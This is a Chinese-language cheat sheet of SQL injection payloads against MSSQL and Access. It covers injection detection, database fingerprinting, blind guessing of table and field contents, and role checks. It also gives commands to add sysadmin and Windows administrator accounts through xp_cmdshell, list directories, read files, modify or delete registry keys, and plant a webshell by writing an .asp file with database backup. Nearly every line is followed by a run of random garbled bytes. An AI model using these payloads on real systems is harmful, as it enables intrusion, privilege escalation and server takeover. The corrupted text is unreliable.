1.判断是否有注入;and 1=1 ;and 1=2 Q[S"�"P.Z|
2.初步判断是否是mssql ;and user>0 Wl�}�d6ZTm
��~c+0Su�J
3.注入参数是字符'and [查询条件] and ''=' ��JhIgq�W2
S�'��s�\M5
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 7��\�eN�8+
-k=�02?0p+
5.判断数据库系统 we!�}"'E;
��C;�M�.dd
;and (select count(*) from sysobjects)>0 mssql n�x��Cwg�>
r�k{DrbRx�
;and (select count(*) from msysobjects)>0 access �<1>\?$)D�
yX?& K}�JI
RD<l�<+C^~
����Uu��W"
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Ydh]�EO0�'
�36�e�!je�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 l$�z\8��]x
g*TAaUs|n
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 6;�k#|-GU&
�$s��$�z"<
9.(1)猜字段的ascii值(access) hC=9%u�{r?
�V�0�7e29w
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 BJ�wPS�K�L
t=T�u-�2,k
(2)猜字段的ascii值(mssql) ]H�C�u tq�
za���f%�%�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 S8^W�)XgC;
D^$Nn�*i;U
10.测试权限结构(mssql) lt[�{�u$��
"�8>*O;x�k
�Ns?y)
G>:
H"6Sj-<��=
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- w-pdp�bHV�
y7txI�e!<5
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �
Q�47Rriw
��+��v{<�<
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- @;!s"!�~sv
"JT R5;`w�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ggIz)��</�
uAwT)km
�{
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- );�'8*e�'�
C A�VqjT7�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ^W{�+�?q'�
iZ�yhj%#�
;and 1=(select IS_MEMBER('db_owner'));-- Lc�I�,Dy|P
�76(-!Z@=J
�TU&gj�1�
�1��7
Hd�j
11.添加mssql和系统的帐户 4Bsx�[~ u&
�8xW_N"P.>
;exec master.dbo.sp_addlogin username;-- Tl6%z9rY@
;exec master.dbo.sp_password null,username,password;-- FhVi|V���a
"h�dc��B
0
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- e�/'d�0Gb-
3V>2N)3`A
;exec master.dbo.xp_cmdshell 'net user username password 1-�!u=]JDE
��:'�'��^a
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ~m�2tWi��@
"9:1>Gr{G�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �#�XE`8�$
�E=+v1\t)]
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- a=>PG�r�iL
E�w�~piuj
�,Y6Me�+5B
v,#*%�Gn`%
12.(1)遍历目录 =y��JJq=!�
>v��F=}1_L
;create table dirs(paths varchar(100), id int) ��A
M8bem~
B[w~bW|K��
;insert dirs exec master.dbo.xp_dirtree 'c:\' p��)�N��hV
WL�qwn�tzk
;and (select top 1 paths from dirs)>0 %{Ez0XwGCn
��S7v�T��=
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) � ��df;�-E
PBc.}TSGj�
x<W`2D��u�
l6I�pyI�ex
(2)遍历目录 maW,YO�yRN
R]�L|&{���
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- `��Hld�#+R
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 O RAK�g.49
���of��!Bz
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 z�'G�YU�=�
xj~5/)XX|X
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 H�48�`z'�o
:�f<3`�x�'
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ]��U.1���z
^W+q!pYM9+
�t�=�J WD2
8�T6.Zh�v
13.mssql中的存储过程 bR"�hl? &c
��p}_n
:�a
xp_regenumvalues 注册表根键, 子键 U2�l7@uDr;
"$�#X�[��.
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ]�c�%y�ib
})f��4`$qf
xp_regread 根键,子键,键值名 L�8�s�HG$[
JFf*�v6:�,
;exec xp_regread @5jJoy(mX@
Exd$v�"s
Y
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 6fV%[.��RR
sJu^de�X�
xp_regwrite 根键,子键, 值名, 值类型, 值 A�d�!�=
*n
Y��z4)Q�1�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �MM8�@0t'E
R%B"G�tl)�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��L>V��Z-j
�huVw+vAA�
xp_regdeletevalue 根键,子键,值名 DdJ>1�504
BBnW0v�AZ*
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 c�@H:?s!0R
%6��r��MS}
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �M�5DQ{d<r
� mkH�{%7n
O�/b~TV�A�
g$�+u;�ER5
14.mssql的backup创建webshell ?`T�<
sk8c
:��KY920/,
use model ��)�*<�=:
$h"�Ht2/ J
create table cmd(str image); 1��|/P[!u�
W�3K&C[��f
insert into cmd(str) values (''); ��P�6q`i<�
��c�4��Q{�
backup database model to disk='c:\l.asp'; <���5�rs�~
#�m
yiZL�%
&s m7R i
wc@��X:${
15.mssql内置函数 .PjJ g�^�^
|�K�E���q-
;and (select @@version)>0 获得Windows的版本号 ���=d0�7�c
�?z�,^QjQ}
;and user_name()='dbo' 判断当前系统的连接用户是不是sa IR�y!8A=X�
fT9z� �4[M
;and (select user_name())>0 爆当前系统的连接用户 uL�Fn��uK
Hj�l{M�>z�
;and (select db_name())>0 得到当前连接的数据库 qIE�e7;DO
xe ng�`�!�
zGKDH=Yy ;
l�FvRXV^+f
16.简洁的webshell �:�6R0=�oz
hF`e�>?bN
use model W[B%,K�m%]
pe�(�31%(h
create table cmd(str image); %g1{�nG�ah
�"�p]b�sJG
insert into cmd(str) values (''); '�:al4m��"
kT|{5Kn&�s
backup database model to disk='g:\wwwtest\l.asp';
